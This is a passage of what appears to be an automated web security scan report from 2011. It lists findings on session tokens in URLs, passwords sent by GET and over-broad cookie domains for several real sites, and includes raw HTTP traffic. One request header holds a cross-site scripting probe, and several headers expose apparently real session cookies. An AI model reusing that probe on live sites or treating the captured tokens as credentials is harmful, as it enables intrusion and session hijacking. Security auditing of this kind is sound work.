The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://manage.softlayer.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://manage.softlayer.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.2. https://manage.softlayer.com/Sales/orderComputingInstance previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://manage.softlayer.com
Path:	/Sales/orderComputingInstance

Issue detail

The response contains the following links that appear to contain session tokens:

https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.3. https://manage.softlayer.com/index/index previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://manage.softlayer.com
Path:	/index/index

Issue detail

The response contains the following links that appear to contain session tokens:

https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&byhref=1&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&file=visitorWantsToChat&site=12703439&SESSIONVAR%21skill=Sales-SL-Portal-English&imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

8. Password field submitted using GET method previous next
There are 7 instances of this issue:

/
/login
/register
/search
/submit
/topic
/upcoming

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

8.1. http://digg.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.2. http://digg.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/login

The form contains the following password field:

password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.3. http://digg.com/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/register

The form contains the following password field:

password

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.4. http://digg.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/search

The form contains the following password field:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.5. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx

The form contains the following password field:

password

Request

Response

8.6. http://digg.com/topic previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/topic

The form contains the following password field:

password

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.7. http://digg.com/upcoming previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/upcoming

The form contains the following password field:

password

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. Cookie scoped to parent domain previous next
There are 44 instances of this issue:

https://accountservices.passport.net/gethip.srf
http://api.twitter.com/1/statuses/user_timeline.json
http://c.microsoft.com/trans_pixel.aspx
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://adx.adnxs.com/mapuid
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bstats.adbrite.com/adserver/behavioral-data/0
http://cang.baidu.com/do/add
http://clk.atdmt.com/MRT/go/285207471/direct/01/
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
https://ebanking.ubs.com/en/
http://ib.adnxs.com/seg
http://idcs.interclick.com/Segment.aspx
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
https://live.zune.net/xweb/passport/bottomCB.aspx
https://live.zune.net/xweb/passport/rightCB.aspx
https://live.zune.net/xweb/passport/topCB.aspx
http://m.adnxs.com/msftcookiehandler
https://msnia.login.live.com/ppsecure/post.srf
http://p.brilig.com/contact/bct
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/G10937/a4/0/0/0.302
http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js
http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif
http://profile.live.com/badge/
https://quotes-public.ubs.com/
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it
http://r.turn.com/r/beacon
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999
http://rs.gwallet.com/r1/pixel/x1094
http://rs.gwallet.com/r1/pixel/x1225
http://rs.gwallet.com/r1/pixel/x368
http://rs.gwallet.com/r1/pixel/x369

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. https://accountservices.passport.net/gethip.srf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://accountservices.passport.net
Path:	/gethip.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.2. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06DGNzcmZfaWQiJTNlMDdhMzJjOGY5OGRi%250AY2IxNGUzNGE0NWM0MzJkM2E1OgdpZCIlZDQ0OTU0MDY5OWE0OGQ1NDYzZWY4%250AZjQzYmFjNzI0MjUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--25bb772d1d71a9f9c11b1038f0fad6e3f4958060; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=68453667229020161&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15163484 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1309445969207029; __utma=43838368.1598605414.1305368954.1308923300.1309960866.11; __utmb=43838368.1.10.1309960866; __utmc=43838368; __utmz=43838368.1309960866.11.4.utmcsr=techflash.com|utmccn=(referral)|utmcmd=referral|utmcct=/about.html; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=v1%3A130884465537011414; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06B2lkIiVkNDQ5NTQwNjk5YTQ4ZDU0NjNl%250AZjhmNDNiYWM3MjQyNToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0%250AYTQ1YzQzMmQzYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f3d4f811a37ea07fd8b37060d2e6643dd71eac68

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309961052-4529-6887
X-RateLimit-Limit: 1000
ETag: "9c237181185d2b078bf4fda3390239f0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 14:04:12 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01930
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114aff9ed0a
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 239a05ec8562be929883e9ec9c5449f8d4242a71
X-RateLimit-Reset: 1309964469
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06DGNzcmZfaWQiJTNlMDdhMzJjOGY5OGRi%250AY2IxNGUzNGE0NWM0MzJkM2E1OgdpZCIlZDQ0OTU0MDY5OWE0OGQ1NDYzZWY4%250AZjQzYmFjNzI0MjUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--25bb772d1d71a9f9c11b1038f0fad6e3f4958060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4534
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

9.3. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

9.4. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_21Ju="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdtxkQw36sCSYws02VZnJBV5kVSiK63S0EPqGm20LIDE9g+EqSScZygA5IU5+z66nnzLIa4a+7jtG5zGxdSOV8gUFMvADbUUtaV0aUFiT91q+ex1xkYsKntNNFsTWgrWvRLDQLcNSXvlo3q/KRLeq1Pt82RLf/iCbh+spqJnWAahKpqVwV1XfLfMqHxF1tt52T6X4XQJnlBkHE3Wh9VIiwTsaJC/Aq2Ad3J/wZkceWWAKEdn3cBVIemRNjLVhipHrU63PvzZh1oA2XIbv8Ol1lT1LA5j01RZ5k9XwOnC5XNzrIH1oz0isg0TzZW7wAl7g+OtStP75TuAqIoBh3pzL3nxQppOZbcyJtR8i+nwcV6W1s+9zZ0DRPaAUvy5sWJvgMGsbHK8j9BLddS6cOygwoKDBjGgUkE4h+R8lM2CGp4UoY3LPcymXrjZ7ITdLnOAgrLpNZX7oWm2WLksbc/dPc3bT2Y4F87eu5WmWG9pqQDYBG2hqDGgiWihTYZaXk85vn5wkZECD9XxqHxhGQG8uMFhiHYrV7GUHEGhnycIUcbYVXFWzJw45ZcDaGP53W/7kcSo6QWWOpU8KahGIE1luvVgDDeDprU9mHMUETCH1RKpzeF2tYYoADgWg1mZhWbLysDF30A85/mk/y08a5WXIrHcUO/89jMoeG/MHpq9qi88PH++kpKpgeolkyyCmBNUjSLe6lSf98K1wSSpGYcMKKBm00r2Pa5Ax5XjA1phGc1A2q3WPty6Jc89mIViybtCsaKvucMZ0x+CUSbRyT8Eu3gB2PAGcULlu4qbqfdCM8lJvkO0NcA8ErFngNyabbIW+nngn2CAX4iGqmok7lMQR5WbOF76OYQmgvjyUwTufILzg6XUOwjgbgodQtpc3VOjVC6wKFrq+e1uyFY8XG7R72ASfx61FUCYJunZDMLz7rO5GMQn/HUUZsSij6HWuBbuWoDjZCr+YFL3SrhaoHbdNv0KWOg2DyvNHYG7oEFZ4kNjozYVWp53qst38j0OcJF6lVAmZWVUQzCDjB6FZsXpFA/rNbFXwNlA56k9MCxvwLF2xnb4n2BWu/nIGtet5cYKjqiefRfVhzOI7W+WK6xu4I4g1SldqVcN5+xGhW08iGnmBJQCtMebPuzVs57PnlNG594/4M2ZlaVgiYXVDMqpYntiVuMwLui2KlpyBieSZohEvUpgVIc866H3cPxeiwwWwKR3MyumJg0unOjSFXohJQyZmQfW5dHaNKg8SBtalXffCnIO3VO9/m+epl8h/516tdq80AR8GGHK/oH/uQgYhPup0jy4wQ3x2XxFxVHxWekwsYRFACs4Im8ipdFuKel/fDp4Wcf4/wGHvG38kNUrYRLH/5IUfh1HslclbaPeX+9U/viEhoLftEnD17Dvw0vA4q5yeBDFnd+R6E/nNj1beItLdElbAMusvIEBzs4srCP/lMhCEh1yJFUv+zuqxT43RbuNwJaYnKoQesQHlZB1DDw9lcA+eAhrOGZq2Ouse4JJqWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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